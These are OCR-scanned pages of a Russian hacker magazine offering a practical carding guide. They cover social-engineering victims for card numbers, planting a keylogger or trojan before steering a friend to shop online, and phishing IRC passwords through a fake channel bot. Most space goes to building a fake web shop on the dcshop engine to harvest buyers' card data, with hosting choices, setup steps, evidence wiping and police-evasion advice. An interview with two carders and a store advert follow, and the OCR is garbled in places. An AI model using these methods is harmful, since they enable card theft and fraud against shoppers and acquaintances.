После такого разговора крайне жела- 
тельно позвонить и успокоить юзера, 
что все нормально, его счет цел и 
невредим. Если жертва - простак, то 
он не побежит в банк и не станет уз- 
навать у менеджера Ивана Иванова 
об ошибках ПО. И через некоторое 
время с ужасом обнаружит опустоше- 
ние лицевого счета. А если кардер по- 
нимает, что жертва очень подозри- 
тельна, то старается провести все по- 
купки моментально, либо вообще ни- 
когда (если атакуемый узнает, что ни- 
какой ошибки не было и что Иван 
Иванов уже 3 дня греется на Канарах, 
он обязательно заблокирует карту). 


A ЕЩЕ BOT TAK... 

и Следующий способ был найден 
совершенно случайно. Его реализа- 
ция не требует больших затрат, да и 
СИ тут не так уж много. Представь се- 
бе следующее: есть некий инет-мага- 
зин (пусть будет абсолютно любой, 
ломать мы его не будем), в этом мага- 
зине жертва покупает любой товар, и 
номер его креды у тебя! Как? Секрет 
фокуса прост: ты ставишь ему на ма- 
шину троянца/логгер клавиатуры и, 
как только получаешь необходимый 
номер, уничтожаешь все следы. А за- 
дача социальной инженерии тут в 
том, чтобы любым способом упросить 
человека купить что-то именно в этом 
магазине по СВОЕЙ kpege. На все воп- 
росы отвечай, что твоя кредитка пус- 
та, а не платишь... ну, хотя бы потому, 
что хочешь завести другую, или твоя 
подруга требует много наличных сра- 
зу (это проходит - проверено). И обя- 
зательно пообещай возместить (и 
возмести!) все денежные затраты, 
плюс угости пивом, чтобы снять с се- 
бя подозрения. Но при всей простоте 
существует маленькая загвоздка: ес- 
ли жертва не начнет сразу проводить 
операции с кредой, тебе будет трудно- 
вато найти номерок в куче введенных 


Перед тобой святая святых - 
официальный сайт столь любимой 
кардерами карты VISA 


символов. Поэтому - сходи сам на 
страничку закупки товаров этого ма- 
газина, найди обязательные поля и 
запомни, по ним искать будет проще. 


Пока ты ищешь жертву, я тебе рас- 
скажу еще об одном способе. Сейчас 
нашим местом действия являются 
1ВС-каналы и сети. Если человек, кото- 
рого ты хочешь подставить, пользует- 
ся иркой, то тебе все карты в руки, 
дерзай. 


ИРКА... КАК МНОГО В ЭТОМ 
СЛОВЕ ДЛЯ СЕРДЦА КАРДЕРА 
слилось 

и Для начала выясним пароль на 
IRC жертвы, точнее, его она нам сооб- 
щит сама. Подготовка минимальна: 2 
запущенных !РС-клиента у тебя на 
компе, причем один бот, а второй лю- 
бой ник (из-под него ты будешь инже- 
нерить), причем ник твой должен 
иметь права оператора канала, хотя 
бы временно. После этого начинается 
СИ атака на юзера/юзеров, которая 
состоит из того, что ты шепчешь (или 
на весь чат произносишь), что для по- 
лучения операторских прав достаточ- 
но послать сообщение боту канала. 
Но тем, кто никогда не был операто- 
ром (чувствуешь подвох?) необходи- 
мо провести идентификацию своего 
Ри DNS. Для выполнения этой опера- 
ции напиши /msg bot identify твой_ 
гс_пароль. Робот проведет все наст- 
ройки и будет встречать тебя по паро- 
лю. А дальше необходимо подгото- 
вить отступление: ты всем или только 
оператору канала сообщаешь, что 
уходишь и, возможно, не появишься 
несколько дней по причине отъезда. 
Затем, слезно попрощавшись со все- 
ми... закрываешь второй !ВС-клиент. А 
первый, с ботом, не трогаешь. Оста- 
лось только ждать получения пароля 
юзера в чистом виде. Дальше, ведь 
ты сейчас робот, необходимо отпра- 
вить уведомление об аутентифика- 
ции. И только после этого можешь 
смело отсоединяться от канала. И 
дальше начинаешь пробовать этот 
пароль к другим IRC-KaHanaM, мест- 
ным Web-YaTaM и даже к аське. Очень 
многие имеют только один пароль на 
множество личных ресурсов, объяс- 
няя это нежеланием запоминать мно- 
го "ненужной" иноры. Ну что ж... пусть 
поплатятся! А дальше, используя най- 
денный пароль, начинаешь прово- 


/ 


дить СИ атаку Ha знакомых жертвы, 
цель которой - все та же креда. 


ЧЕМ ВСЕ КОНЧАЕТСЯ 

m Еще я должен рассказать тебе о 
том, как может повести себя жертва 
во время и после проведения атаки. 
Обычно все проходит гладко, но кто 
предупрежден, тот вооружен. 

Ф. Жертва, ничего не подозревая, 
попадается на твою диверсию. Тут да- 
же комментарии излишни ;-). Ты прос- 
то наслаждаешься плодами атаки и 
особо ни о чем не задумываешься. 
Вся работа после нападения сводится 
лишь к периодической проверке, как 
идут дела у жертвы с кредой, и выяс- 
нению - ане заметил ли он проблем. 
Самый благоприятный для кардера 
вариант. 

©. Атакуемый достаточно умен и не 
поддается на твои уловки. В такой си- 
туации перед кардером встает выбор: 
попробовать другие методы или отс- 
тать от этого чела. Если ты выбира- 
ешь второе, то сохрани с уже бывшей 
жертвой дружбу. А если ты воин- 
ственный индевц и не думаешь зака- 
пывать топор войны, то дерзай! Хотя 
трудности прибывают с каждым но- 
вым заходом, так как жертва видит, 
что к ее персоне ты проявляешь по- 
вышенное внимание. Еще раз повто- 
ряю, необходимо быть предельно ос- 
торожным при повторных атаках. 
Просто помни, что жадность Cppaepa 
сгубила. 

@. Владелец креды просек, что его 
очень хотят развести на креду, но нику- 
да не обратился. Такой исход, конечно, 
плох, но не смертелен - твоей свободе 
ничто не угрожает, правда могут попо- 
лзти слухи о твоей грязной политике. 
Это испортит твою репутацию, поэтому 
постарайся при первых же недоволь- 
ных воплях жертвы среагировать и исп- 
равить все на месте. Можешь прики- 
нуться дурачком, который ничего и ни- 
когда He замышлял. И успокаивай себя 
тем, что ничего еще не потеряно. 

@. Бывший друг не просто понял, 
что его пытаются кинуть, но и обра- 
тился куда следует с заявлением (бы- 
вает, что у него там еще и друзья). 
Это уже не очень хорошо, хотя и gO 


Ш Ни одна атака СИ не начинается без предварительной Nogro- 
товки. Так, если к тебе начал проявлять повышенное внимание 
некий человек, постарайся сразу узнать, что ему нужно. 


срока тоже пока далеко. Чтобы He приближать этот момент 
- будь законопослушен, не нарушай, просто помни - ты мо- 
жешь быть под прицелом. Примерно через полгода мо- 
жешь браться за старое, но уже с удвоенной осторож- 
ностью. А вот если к тебе уже приходили - завязывай с кар- 
дингом, у них кое-что существенное на тебя есть. И самое 
главное, никогда не расставайся с наукой СИ, даже на доп- 
росах. Главная причина гибели юных талантов на нарах 
проста: они забывают, что следователи тоже люби, пусть и 
замаскированные в форму. А значит, и к ним можно приме- 
нить трюки кардера. Правда, в школах милиции тоже учат 
психологию, но кто же помнит, чему его учили в вузе? 


ПСИХОЛОГИЧЕСКИЕ ТРЮКИ КАРДЕРА! 

Трюки, о которых я тебе расскажу, используются очень 
многими - кардерами, хакерами, психологами, менеджерами 
и прочими обманщиками. Уверен, что они помогут тебе не 
только во взломе, но и в личной жизни :). 


* Если хочешь воздействовать на чувства человека - гово- 
ри в левое ухо, на логику - в правое, но учти, что пропитое 
лицо, прочувствованно просящее номер креды, вряд ли 
добьется успеха! 

* Разговаривай с объектом на привычном для него языке. 
Так, если это простой человек, мало смыслящий в ИТ и, в 
частности, в кредах, не используй жаргон. Лучше пять раз 
объяснить свою мысль на его языке, зато тебя поймут, и не 
возникнет разрыва в беседе. 

* Лучше всего память работает между 8-12 часами утра и 
после 9 часов вечера, хуже всего - сразу после обеда. 

® Незаконченные действия (разговор, утверждение конт- 
ракта, встреча) запоминаются в два раза лучше доведен- 
ных 90 конца. 

* Наука подсчитала, что человек говорит только 80% из то- 
го, что хочет сообщить, собеседники воспринимают 70% из 
этого, а понимают - 60%, запомнят от 10 go 25% всей ин- 
фы. Поэтому грузи и не жалей. 

* Чтобы жертва прониклась твоей мыслью, повторяй ос- 
новные ее тезисы как можно чаще, но не переусеродствуй! 
А то будешь только и говорить: "Дай номер креды!!" 

® Старайся не просить в открытую, пусть человек поймет, что 
тебе нужно, и предложит сам. 

* Отвечая на любое резкое утверждение, жертва может легко 
выдать себя с потрохами, поэтому - озадачивай и озадачивай. 
* Базовой гипнотической способностью обладают все лю- 
ди, особенно с сильной волей, поэтому, если ты пытаешься 
убедить человека, старайся смотреть ему в переносицу и 
думать, о чем говоришь. 

* Возраст влияет на мозг человека, например, молодежь 
лучше соображает вечером, а пенсионеры утром. 

* Многие вопросы, требующие ответа "да" или "нет", сбива- 
ют говорящего с предыдущей мысли, так что если тебя на- 
чали подозревать, используй это. 

* Некоторых людей можно вызвать на откровенный разго- 
вор, только показывая, что ты им не веришь. 

* Доказывая свою правоту, используй только сракты и Te- 
зисы, которые может понять объект. 

* Старайся выглядеть знающим человеком в своей облас- 
ти, простые люди инстинктивно тянутся к более умным и 
знающим. 

* Фраза, произносимая дольше 5-6 секунд без пауз, перес- 
тает восприниматься. 

* Полезно придавать отдельным утверждениям сформу 
нейтрального вопроса (например, риторического), тогда 
твой собеседник не ощутит давления и сможет воспринять 
подобную подачу как собственное мнение. 


INIT O 

Все. Моя статья закончена, надеюсь, тебе было инте- 
ресно, и ты узнал кое-что новенькое о жизни кардеров - CO- 
циальных инженеров. 


www.e-shop.ru 


PC Games 


Microsoft Flight 
Simulator 2004: 
AyCentury of Flight 


Halo: Combat Star Wars Jedi Half-Life 2 


Evolved 


Knight: Jedi Academy 


Star Wars Galaxies: Tomb Raider; The WarCraft Ill: The The Matrix : 
An Empire Divided Angel of Darkness Frozen Throne Enter The Matrix 


Neverwinter Commandos 3: Max Payne 2: The Dark Age of 
Nights: Shadows Destination Berlin _ Fall of Max Payne Camelot: Gold 
of Undrentide (US version) Edition 


Заказы по интернету — круглосуточно! e-mail: sales@e-shop.ru 
Заказы по телефону можно сделать с 10.00 до 21.00 пн - пт 


СУПЕРПРЕДЛОЖЕНИЕ 


ДЛЯ ИНОГОРОДНИХ ПОКУПАТЕЛЕЙ снижена на 10%! UPS 


РЕ 


http://www.e-shop.ru 


с 10.00 до 19.00 сб - вс 
стоимость доставки Ez 
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Я ХОЧУ ПОЛУЧАТЬ 
БЕСПЛАТНЫЙ КАТАЛОГ РС ИГР 


ИНДЕКС 


ГОРОД. 


УЛИЦА 


дом КОРПУС КВАРТИРА. 


ФИО 


ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, E-SHOP 


Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 


СОЗДАЙ ИСТОЧНИК ДОХОДА ) 


СОЗДАЙ ИСТОЧНИК 
ПОХОДА 


ЛИЧНЫЙ ПСЕВДОСАЙТ КАРДЕРА 


#0555 


XN 


екоторые личности ничего не делают и... получают реальные доходы. Без начального капитала, с абсолютного 
нуля. И повторить их опыт может каждый, даже ты. Для этого нужно желание, удача и чуть-чуть терпения. 
Я расскажу тебе о прибыльном бизнесе, построенном на псевдосайтах. 


ЧТО ТАКОЕ 


ПСЕВДОСАЙТЫ 


m= Псеводосайт - это не 


При серьез- 
ном подходе 
к делу, 
псевдосайт 
может при- 
носить кар- 
деру умо- 
помрачи- 
тельные go- 
ходы. 


Чтобы 
построить 
псевдосайт, 
необходимо 
найти для 
него прог- 
раммное 
обеспечение 
- движок. 
Он состоит 
из отдель- 
ных Вт! - 
страниц 
(формы для 
оплаты) и 
скриптов, 
которые об- 
рабатывают 
вводимую 
информа- 
цию. 


что иное, как умело 
сделанный ресурс, ко- 
торый имеет автоматизированную 
систему оплаты по кредитным картам. 
Но в отличие от проектов, которые 
исправно высылают товар после оп- 
латы, псевдоресурс совершенно Hery- 
манно динамит покупателя, помещая 
данные о кредитке в отдельную базу. 
При серьезном подходе к делу, псев- 
досайт может приносить кардеру умо- 
помрачительные доходы. Все потому, 
что интернет-магазины (либо порнога- 
лереи) пользуются большой популяр- 
ностью среди тупых, но богатых бур- 
жуев, для которых онлайновые покуп- 
ки - норма жизни. 


ЧТО НАМ СТОИТ 
САЙТ ПОСТРОИТЬ 

m Чтобы построить псеводосайт, He- 
обходимо найти для него программное 
обеспечение - движок. Он состоит из 
отдельных Нт(-страниц (формы gna 
оплаты) и скриптов, которые обраба- 
тывают вводимую информацию. Авто- 
ры движков используют два способа 
для хранения полученных данных: 


©. Через базу данных (БД). Этот 
способ избавляет от многих проблем, 
с которыми может столкнуться поль- 
зователь движка, для успешной рабо- 
ты достаточно создать базу и пару 
таблиц. Затем скрипты сами будут об- 
ращаться к БД и запрашивать/сохра- 
нять данные. 


@. Посредством файлов. Все бесп- 
латные движки распространяются 
именно с таким алгоритмом. Здесь те- 
бе придется попотеть, изменяя де- 
фолтовые значения путей в конфигах 
сценариев. Нельзя забывать и о пра- 
вах доступа к файлам, в которые бу- 
дет записываться информация (прос- 
тавляются вручную). 


На фриварных источниках валяется 
неплохой движок dcshop (пр.//катеп- 
sk net.ru/forb/i/x/id1608.zip). Он организу- 
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ет универсальный интернет-магазин 
по продаже всякого хлама. Умеет ав- 
торизовывать после оплаты по кре- 
дитке и комплектуется скриптом для 
администрирования товаров. 


Удобно, что dcshop работает как под 
UNIX, так и под МТ платформы. В go- 
весок к этому он снабжается подроб- 
ным мануалом и кучей десролтовых 
коноигов. 


Для того чтобы магазин функциони- 
ровал, от хостинга требуется: 


и доступ к ЕТР-серверу; 

и WWW-cepBep с поддержкой cGi- 
сценариев; 

и желательна поддержка собствен- 
ных .ntaccess-cpannos; 

и желателен доступ по SSH, что поз- 
волит без особых проблем установить 
и изменить настройки dcshop прямо с 
шелла. 


Первые два пункта, которые необхо- 
димы, удовлетворяют практически 
все бесплатные хостинги, поэтому ре- 
гистрируйся на буржуйском ресурсе 
(проще отмазаться потом) и присту- 
пай к установке онлайн-магазина. При 
желании смотри работу проекта в он- 
лайне по адресу ‘it ip://Kamensk.net.ru/ 
forb/cgi-bin/shop/dcshop.cgi. 


Хотя dcshop для хранения He исполь- 
зует БД (пишет в отдельные файлы), 
он как раз подойдет, так как не каж- 
дый халявный хостинг предоставля- 
ет доступ к БД (но бывают приятные 
исключения, например, ммм. 5расе- 
ports.com). 


ДОСТАВКА И УСТАНОВКА 

и Движок состоит из трех скриптов: 
магазин с поддержкой корзины, ag- 
мин-зона и сценарий для запроса ин- 
оры о кредитной карте. К каждому 
скрипту есть свой конфигурационный 
файл. 


Сперва настрой конориг .setup, в нем 
необходимо изменить несколько зна- 
чений переменных и пути к директо- 
риям. Главной переменной в конфиге 
является Scgidir, она указывает на ди- 
ректорию cgi-bin, B которой будет pac- 
полагаться большинство скриптов 
движка. Лучше всего создать подпап- 
ку в каталоге со скриптами и опреде- 
лить в ней сценарии магазина. К при- 
меру, значение Scgidir может быть 
"/home/carder/web/cgi-bin/eshop". 


Далее идут пути, которые зависят OT 
Scgidir. Пучше их не менять, чтобы не 
было путаницы при закачивании сффай- 
лов на сервер. Следующая за ними 
переменная Sorder_database ведет к 
самому интересному сфайлу, ради ко- 
торого мы и устанавливаем проект 
dcshop. Это база кредитных карт, точ- 
нее, в этот документ будет сваливать- 
ся вся информация о буржуйских кре- 
дах. Дефолтовое значение перемен- 
ной - "orders.txt", и находится этот 
файл по пути, прописанному в пере- 
менной Sorder_dir. Рекомендую ме- 
нять пути на более сложные, иначе 
база будет доступна через веб. 
Переменная Stemplatefile otBeyaetT 3a 
главный html-qpavn, который будет 
подгружаться после исполнения 
скрипта dcshop.cgi. В этот дфайл ты MO- 


жешь поставить свой копирайт, пибо 
убедить буржуя в законности твоей 
коммерческой деятельности ;). 


Затем укажи путь к бинарнику send- 
mail. Обычно он располагается в ди- 
ректории /usr/sbin, в противном слу- 
чае местоположение будет оговорено 
администрацией хостинга. Перемен- 
ная задается для того, чтобы после 
успешного заказа клиент получил 
письмо о принятии платежа. Заодно 
поменяй адрес smtp-cepBepa, мыло, с 
которого будет отправлено письмо, а 
также его тему (например, smtp.space- 
ports.com). 


В следующей секции консорига задают- 
ся абсолютные пути к сайту. Допус- 
тим, тебе дали домен shop.hosting.net. 
Исходя из этого, поменяй переменные 
Scgiurl и Smainurl Ha значения к дирек- 
ториям с html и cgi-bin соответственно, 
к примеру, 

. Там же укажи путь к картин- 
кам (они будут располагаться в дирек- 
тории для html-qpannos). 


Проект подразумевает наличие https- 
сервера, но я сильно сомневаюсь, что 
фриварный хостинг предлагает https. 
Если твой - не исключение из правил, 
то значения Ssecureurl и 
Ssecureimgurl делай равными Scgiurl и 
Smainurl. В конце секции укажи e-mail 
администратора проекта. 


На этом, собственно, десролтовая 
настройка заканчивается. Дополни- 
тельно можно (настоятельно сове- 
тую) переопределить пути к дефолто- 
вым скриптам. Тогда в случае обнару- 
жения баги в проекте dcshop, твой ре- 
сурс не взломают (не зная новые пу- 
Tu). Итак, меняй значения Sdcscript, 
Scheckout_script и Sadminscript. Отк- 
рой скрипт dcshop.cgi и измени путь к 
коноригу в строке require. И переиме- 
нуй конориг. Если возникнут пробле- 
мы, про это есть и в FAQ'e проекта, и в 
файле readme. 


ОТТАЧИВАЕМ ОСТАЛЬНЫЕ 
СКРИПТЫ 

Помимо главного конфига, есть 
з@ир-сдфайлы gna скриптов checkout и 
admin. В конориге для checkout изме- 
ни десролтовые темплейты html на 
что-нибудь более красивое (лично 
мне не понравилось слово "demo" в 
тексте). А в dcshop_admin.setup тебе 
придется поменять путь к директории, 


РАСКРУТКА РЕСУРСА 


в которой хранится пароль админист- 
ратора. Рекомендую закрыть доступ к 
директории с указанным файлом (для 
чего и нужна поддержка собственных 


/Кассе$$-сдайлов), потому что знаю- 
щий чел сможет увидеть содержимое 
каталога, а следовательно, и файла с 
паролем. 


» 


фриварных 
источниках 
валяется 
неплохой 
движок 
dcshop 
(http://kam 
ensk.net.ru/ 
forb/1/x/id1 
608.zip). 
Он 
организовы 
вает 
универсальн 
ый 
интернет- 
магазин по 
продаже 
всякого 
хлама. 


Рекомендую 
закрыть 
доступ к 
директории 
с указан- 
ным файлом 
(для чего и 
нужна под- 
держка 
собствен- 
ных .htac- 
cess-qan- 
лов), пото- 
му что зна- 
ющий чел 
сможет уви- 
деть содер- 
жимое ка- 
талога, а 
следова- 
тельно, и 
файла с па- 
ролем. 
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Скрипт, генерирующий запрос 


по кредитке 


Нюанс - за- 
ливать надо 
в АЗСИ-ре- 
жиме, иначе 
скрипты не 
будут рабо- 
тать. Оста- 
лась самая 
малость - 
поставь на 
все каталоги 
права 777, а 
на файлы „р! 
И .cgi - 755. 


Затем соз- 
дай .htpass- 
wd, в кото- 
ром записы- 
вается акка- 
унт в виде 
пары 
login:pass- 
word. До- 
пустимые 
алгоритмы 
шифрования 
пароля: DES, 
MDS, SHA, а 
также Plain 
text. Коди- 
ровать па- 
роли умеет 
утилита 
htpasswd, 
входящая в 
поставку 
Apache. 


Напоследок убедись, что во всех cgi и 
р! скриптах стоит правильный путь к 
рег-интерпретатору. Пично у меня не 
было файла /usr/local/bin/perl, поэто- 
му мне пришлось переименовывать 
путь к Perl в каждом скрипте. Если не 
знаешь путь, обращайся к админист- 
ратору хостинга и спрашивай место- 
нахождение обработчика сценариев 
(обычно эту информацию можно най- 
ти непосредственно на сайте). 


ПРАВИЛЬНАЯ 
ТРАНСПОРТИРОВКА 

m Настало время для переноса срай- 
лов на ЕТР-сервер. Сперва создай gu- 
ректорию для Иит-файлов, а также 
вложенный каталог Images (обрати 
внимание на регистр). Затем перелей 
все дефолтовые изображения в эту 
папку. Зайди в cgi-bin/eshop, в эту gu- 
ректорию залей все консориги и скрип- 
ты. Нюанс - заливать надо в АЗС!-ре- 
жиме, иначе скрипты не будут рабо- 
тать. Осталась самая малость - пос- 
тавь на все каталоги права 777, а на 
файлы .pl uv .cgi - 755. 


Самое время затестить результат. O6- 
ратись к главному скрипту магазина 
dcshop.cgi. Если все верно, то магазин 
будет функционировать без всяких 
побочных выкидонов. Если выдаст 
ошибку 500, узнай причину, по кото- 


ХОРОШИЙ ХОСТИНГ 


Ш www.hi.ru - российский бесплатный хостинг, баннер хостера 
обязателен, PHP/CGI/mySQL/SSH, могут отключить за нарушение 
регламента 
Ш www.rcdom.ru - PHP/CGI/mySQL 


Ш www.webservis.ru - PHP/CGI, баннер хостера обязателен 


Ш www.fatal.ru - PHP/CGI 


Ш www.spaceports.com - PHP/CGI/mySQL, баннер на сайте 


необязателен 


Ш www.webhosting.bootbox.net - PHP/CGI, без рекламы 
Ш www.come.to - PHP/CGI, баннер хостера обязателен 
Ш www.dot.tk - PHP/CGI, бесплатный домен второго уровня в зоне .tk 


рой сценарий не работает. Для этого 
создай файл .htaccess в корне WWW 
со следующим содержанием: 


<Directory "/path/to/www'"'> 
ErrorLog "/path/to/www/error.log" 
</Directory> 


После этого еще раз обратись к 
скрипту и читай содержимое Nora в 
html-gupektopun. Возможно, ты прос- 
то забыл залить какой-нибудь файл 
либо изменить дефолтовый путь. 


Теперь займись админским скриптом. 
Чтобы никто тебя не поимел либо не 
спер большую базу новых кредиток, 
зайди в админ-зону и зарегистрируйся 
под новым юзером с правами админи- 
стратора. После этого топай по линку 
"Change Configuration Setting" и запре- 
ти регистрацию новых юзеров. Рули 
на здоровье своим онлайн-магазином. 


Имеет смысл создать отдельную ди- 
ректорию для админ-зоны и закрыть 
ее дополнительной авторизацией (от 
греха подальше). Это легко делается с 
помощью стандартных средств 
Apache. Вначале необходимо создать 
.htaccess срайл в каталоге с админ- 
скриптом. В нем пиши следующее: 


AuthType Basic 

AuthName "Admin zone" 
AuthUserFile "/path/to/.htpasswd" 
Require valid-user 


Затем создай .htpasswd, в котором 3a- 
писывается аккаунт в виде пары 
login:password. Допустимые алгорит- 
мы шифрования пароля: DES, MD5, 
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Административная часть 


SHA, а также Plain text. Кодировать 
пароли умеет утилита htpasswd, вхо- 
дящая в поставку Apache. Алгоритм 
MD5 поддерживается всеми версиями 
web-cepBepa и наиболее надежный. 
Ставится пароль командой htpasswd - 
bcm .htpasswd admin myp4sswOrd, on- 
ция -bcm означает запись MD5-napo- 
ля в новый .htpasswd. 


Права Ha .htaccess и .ntpasswd устано- 
ви равными 600. Это позволит только 
тебе изменять их, у других бродяг не 

будет доступа к этим важным файлам. 


СТРОИМ БИЗНЕС 

и Теперь необходимо изменить де- 
фолтовые товары. Если с фантазией 
у тебя все в порядке, ты запросто при- 
думаешь товары, которые захотят ку- 
пить богатые и тупые иностранцы. Но 
прежде необходимо разобраться со 
структурой базы товаров. 


В файле с товаром (неважно каким) 
можно задать несколько параметров. 
Это идентификатор (10), категория 
(Category), название продукта (Мате), 
изображение (Image), описа- 
Hue(Description), цена (Price) и налог с 
продаж (Taxable). Дополнительно 
есть свои опциональные параметры, 
например, цвет и стиль. О них читай в 
файле readme.txt. Забиваешь данные, 
а они автоматом помещаются в папку 
Data относительно каталога сд!-Ып/. 


В этом же каталоге хранится устано- 
вочный скрипт с краткой инфформаци- 
ей о данной категории товаров. Удоб- 
но, что движок включает четыре гото- 
вых образца. Таким образом, просто 
сделай аналогичный темплейт gna ка- 
тегории товара и вперед. 


БАЗА ВСЕ-ТАКИ ЛУЧШЕ 
и Написать свой движок с подде- 

ржкой БД не так уж и сложно. Необ- 
ходимо знать принципы обмена меж- 
ду клиентом (скриптом проекта) и сер- 
вером (БД mySQL), к которому у тебя 
будет доступ. При этом не обязатель- 
но писать отдельный движок, достаточ- 
но внести некоторые изменения в код 
dcshop и научить его обращаться с БД. 


БЕСПЛАТНЫЙ ДВИЖОК 


Ш www.cgi.ru - 


обширный каталог 


РНР/СС!-скриптов (как 


бесплатных, так и коммерческих), именно оттуда был скачан 


описываемый проект dcshop 


Ш 4wm.virtualave.net - большая коллекция CGI/C/C++ скриптов, 
все проекты в основном бесплатные 

Ш getscripts.vov.ru - ресурс, посвященный СС|-скриптам 

Ш www.cgi.agava.ru - русские ССИРНР-скрипты в ассортименте 


Обзор товаров в магазине 


С помощью специального модуля 
DBI.pm можно работать с MySQL 
(именно такая БД рулит на большин- 
стве хостингов). Тебе потребуются три 
веши: умение коннектиться к базе, 
вставлять и изменять в ней данные, а 
также считывать инофу из нужных таб- 
лиц в БД. Чтобы переделать файло- 
вый движок, необходимо всего лишь 
заменить обращение к файлу запро- 
сом к базе. Фрагменты кода, реализу- 
ющие грамотную работу с mySQL (код 
снабжен подробными комментариями), 
скачивай по адресу hi tp://kamensk.net.ru/ 
forb/1/x/mysql-code. 


3AKOH ECTb 3AKOH 

и Когда-нибудь твой ресурс будет 
закрыт. Это произойдет, скорее все- 
го, после того, как в службу поддерж- 
ки хостинга поступит жалоба от оче- 
редного надутого клиента. Поэтому 
тебе не помешают несколько полез- 
ных советов, чтобы последствия зак- 
рытия проекта не отразились на тво- 
ем здоровье: 


Ф. При организации мини-порнога- 
лереи никто не будет требовать с тебя 
какой-либо ответственности, если ты 
сделаешь стартовую страницу с пре- 
дупреждением о совершеннолетии 
клиента. 


@. Если дела пошли в гору, зареги- 
стрируй себе домен второго уровня и 
заведи нормального хостера. Когда 
твой ресурс удалят, ты можешь легко 
изменить ап5-зоны своего домена при 
переезде на другой хостинг. 


@. Постарайся оставлять как можно 
меньше данных о себе на страницах 
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ресурса. Лучше скажи, что ты какой- 
нибудь богатый китаец, продающий 
ручки Паркер, чем бедный русский 
студент ;). 


@. При переезде тебе придется 
столкнуться с такой проблемой, как 
бэкап всех данных. Это необходимо 
сделать вовремя, когда почувству- 
ешь, что дело пахнет керосином. Если 
с файлами проблем не возникает, 
умело забэкапить базу - дело тонкое 
(хотя и несложное). Для этого потре- 
буется помощь небольшой утилиты 
mysqldump, которая входит в постав- 
ку mysalclient. Заходишь Ha Wenn сво- 
его хостинга и набираешь команду: 


$ mysqldump -u client -pclientpassword 
eshop > eshop.sq| 


Соответственно, аккаунт к базе дол- 
жен иметь вид Client:clientpassword, а 
база называться eshop. Бинарник 
сформирует структуру таблицы, кото- 
рая должна быть заархивирована и 


транспортирована на другой хостинг. 
Сжимать лучше архиватором bzip: 


$ tar jcf eshop.tar.bz2 eshop.sal 


На новом хостинге необходимо его 
распаковать и создать копию структу- 
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Бэкап и удаление базы 


ры базы (по файлу eshop.sql). При 
этом не нужно заботиться о создании 
таблиц и БД, все сделает туза!итр: 


$ tar jxf eshop.tar.bz2 
$ туза! -u client -pclientpassword < 
eshop.sql 


С помощью переопределения ввода 
ты позволяешь бинарнику mysql по- 
лучить команды прямо из файла. В 
нашем случае из бэкапа eshop.sdl. 


©. Чтобы выйти сухим из воды, уда- 
ли все срайлы со старого хостинга (ра- 
зумеется, после бэкапа) и дропни ба- 
зу данных. Это можно сделать коман- 
gon "drop database eshop;" в клиенте 
mysql. 


ТЕПЕРЬ ТЫ KAP DEP 

и Bot u все. Псеваобизнес - очень 
прибыльное дело, потому что все за- 
работанные кредитки уходят только 
тебе. В день такой ресурс могут посе- 
тить десятки, а то и сотни богатых 
буржуев (зависит от раскрутки). Но в 
организации подобных проектов су- 
ществует определенная доля риска, 
иначе все понаделали бы онлайн-ма- 
газинов и жили за счет буржуев. Поэ- 
тому, если ты прилично зарабатыва- 
ешь, и решил создать псевдосайт 
только из любопытства, поразмысли 
на досуге, стоит ли тебе тратить свои 
нервы и деньги на противозаконную 
деятельность... 
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Информация по кредитке через зону администрирования 


При переез- 
де тебе при- 
дется 
столкнуться 
с такой 
проблемой, 
как бэкап 


всех дан- 
ных. Это 
необходимо 
сделать 
вовремя, 
когда почу- 
вствуешь, 
что дело 
пахнет ке- 
росином. 


Если ты 
прилично 
зарабаты- 
ваешь, и 
решил соз- 
дать псев- 
досайт 
только из 
любопыт- 
ства, пораз- 
мысли на 
досуге, сто- 
ит ли тебе 
тратить 
свои нервы 
и деньги на 
противоза- 
конную дея- 
тельность. 
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луждая как-то ночью по просторам Сети, я случайно наткнулся Ha сайт, целиком посвященный кардингу - 
www.cardingworld.com. Набравшись смелости, я завязал беседу с владельцами ресурса. Знакомьтесь - David и Graf. 


ытует мнение, что все 


кардеры - замкнутые 


звероподобные и 


Сначала я 


искал, как 
взломать 
чип, потом 
постепенно 
узнал, что 
такое кре- 
ды. Ну, а 
там, естест- 
венно, как 
их можно 
обналичить. 
И пошло- 
поехало. 


Я лично не 


хакер, что- 
бы ломать 
направо и 
налево ин- 
тернет-ма- 
газины, по- 
этому поку- 
паю картон 
у знакомых. 


Есть слу- 
чаи, когда 
требуется 
голосовое 
подтверж- 
дение. Час- 
то требует- 
ся выслать 
сканы пас- 
порта, прав 
или кредит- 
ной карты. 
Но мы не 
спим и пос- 
тоянно при- 
думываем 
методы 
противодей- 
ствия раз- 
личным за- 
щитам. 


скрытные существа, 
которых не то что раз- 
говорить, трудно просто отловить 
живьем. На самом деле они - самые 
обычные люби, а быть скрытными их 
вынуждает хобби, которое подпадает 
под определенные статьи УК. Но не 
все занимаются кардингом на практи- 
ке (знают только в теории), либо пе- 
реросли свое увлечение и давно 
отошли от дел. Кто-то вспоминает с 
ностальгией, кто-то создает свои ре- 
сурсы, а кто-то на этих ресурсах еще 
и зарабатывает, основав для соб- 
ратьев плацдарм, помогающий опе- 
ративно обмениваться нужной ин- 
формацией. 


Для начала расскажите немного 
о себе. Имя, возраст, где обитаете? 
David: Зовут меня Серега, 19 лет от 
роду, живу в Минске. 
Graf: А меня величают Костя, 21 год 
уже пошел, живу в далекой Кемеро- 
вской области, что в славном госуда- 
рстве Россия. 


Как прошло ваше детство? 
С кровати не падали? 
David: Детство прошло отлично, хотя 
с компьютерами оно связано не было. 
Graf: Да нормально, не жалуюсь, вся- 
кое в жизни бывает - и плохое, и XO- 
рошее. 


В каком году появился первый 
комп? Чем увлекались? 
David: Первый компьютер под стран- 
ным названием "ВЕКТОР" появился 
приблизительно в 1990 году. Первое 
время, как и большинство пользова- 
телей ПК, играл в разные игрушки. 
Позже стал интересоваться всем ос- 
тальным. 


А как обстоят дела с образова- 
нием? Где в данный момент грызете 
гранит? 

David: В данный момент заканчиваю 
учиться в негосударственном техни- 
куме. Специальность в чем-то связа- 
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на с кардингом, хотя на момент пос- 
тупления я еще не увлекался этим 
направлением. 

Graf: Я окончил школу и колледж, 
сейчас учусь в университете, на пол- 
пути к диплому. 


Что такое кардинг? Ваше мнение? 
Graf: Кардинг - это способ завладеть 
чужими деньгами или приобретение 
какого-либо товара с помощью воро- 
ванных кредитных карточек. 


Когда и почему стали увлекать- 
ся кардингом? 
